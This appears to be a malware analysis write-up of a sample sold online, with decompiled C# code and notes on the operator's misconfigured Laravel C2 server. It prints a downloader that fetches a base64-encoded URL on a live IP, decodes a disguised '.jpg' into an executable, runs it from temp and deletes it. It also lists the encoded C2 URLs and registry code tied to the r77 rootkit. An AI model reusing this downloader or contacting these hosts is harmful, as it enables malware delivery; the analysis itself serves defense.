8e88de63c132f964891dd00501bee5078f27dfcec7ca122f19bd43f9ed933427 Malware Bazaar


  • Malware Sellix link
  • Karsten twitter ref
  • They have a tutorial video! video



The URLs are base64 encoded and link back to the c2 server. In this case the url links to a .jpg file which is infact a base64 endcoded PE.

private static void StopRootkit()
    WebClient webClient = new WebClient();
    Stream stream = webClient.OpenRead(Encoding.UTF8.GetString(Convert.FromBase64String("aHR0cDovLzE5My4zMS4xMTYuMjM5L2NyeXB0L3B1YmxpYy9VcGRhdGVfRG93bmxvYWRzL3JlbW92ZS5qcGc=")));
    StreamReader streamReader = new StreamReader(stream);
    string s = streamReader.ReadToEnd();
    byte[] bytes = Convert.FromBase64String(s);
    File.WriteAllBytes(Path.GetTempPath() + "\\rkd.exe", bytes);
    Process.Start(Path.GetTempPath() + "\\rkd.exe");
    File.Delete(Path.GetTempPath() + "\\rkd.exe");


  • aHR0cDovLzE5My4zMS4xMTYuMjM5L2NyeXB0L3B1YmxpYy9VcGRhdGVfRG93bmxvYWRzL3JlbW92ZS5qcGc= ->
  • aHR0cDovLzE5My4zMS4xMTYuMjM5L2NyeXB0L3B1YmxpYy9VcGRhdGVfRG93bmxvYWRzL3J0LmpwZw== -> There are more...

Downloaded Modules


Deletes the rootkit

public static void remove()
        bool[] array = new bool[2];
        array[0] = true;
        foreach (bool flag in array)
            using (RegistryKey registryKey = RegistryKey.OpenBaseKey(RegistryHive.LocalMachine, flag ? RegistryView.Registry64 : RegistryView.Registry32).OpenSubKey("SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows", true))
                bool flag2 = (registryKey.GetValue("AppInit_DLLs", "") as string).Contains("r77-");
                if (flag2)
                    registryKey.SetValue("AppInit_DLLs", "");
    catch (Exception ex)


This is a simple startup function for an open source userland rootkit that can be found on GitHub r77-rootkit.

Server Misconfiguration

It's almost like the developer knows they made some mistakes...

Laravel Debugger Exposed

A typo in one of the C2 URLs exposed a server error with a full stack trace. This revealed that the developer was uing the laravel PHP framework and had left the debugger publically exposed.

Open Directory

The stack trace led to the discovery that the server root had been configured as an open directory with many files publicly served to the Internet including logs.

Analysis Stopped:

There are more files and download links that could be investigated but the malware is so simple and the server configured so poorly we stopped our analysis. This malware looks more like a hobby project than a professional business...